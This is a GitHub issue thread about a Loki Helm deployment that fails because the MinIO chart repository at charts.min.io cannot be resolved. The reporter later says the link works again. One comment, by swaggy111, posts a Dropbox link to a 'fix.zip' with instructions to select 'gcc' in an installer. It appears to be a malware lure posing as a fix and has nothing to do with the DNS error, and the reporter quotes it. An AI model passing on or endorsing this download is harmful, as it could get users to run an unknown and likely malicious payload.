### ISSUE TITLE
Is there an issue with MinIO, which is a dependency of Loki?

### ISSUE THREAD

**Issue by sstoneju** [grafana/loki#13956]
**Describe the bug**
Is there a problem with connecting Loki to the MinIO chart?

ArgoCD, which was syncing normally, is now showing the following error
```Failed to load target state: failed to generate manifest for source 2 of 2: rpc error: code = Unknown desc = Manifest generation error (cached): `helm repo add https:--charts.min.io- https://charts.min.io/` failed exit status 1: Error: looks like "https://charts.min.io/" is not a valid chart repository or cannot be reached: Get "https://charts.min.io/index.yaml": dial tcp: lookup charts.min.io on 172.20.0.10:53: no such host```

**Expected behavior**
I'm investigating an issue where the Loki Helm, which had been working fine for over two months, is now showing problems.

**Environment:**
 - Infrastructure: `eks-v1.29.7`
 - Deployment tool: `helm via argocd`
 - tag version: `helm-loki-6.6.1`

**Image:**
<img width="1857" alt="image" src="https://github.com/user-attachments/assets/5009c078-0f32-473a-9576-acb4bf89d9d0">

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by sstoneju** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

 @swaggy111  Hi~ Something wrong this link.

**Comment by sstoneju** [comment]
The Minio chart link seemed to have an issue, but it's working fine now.
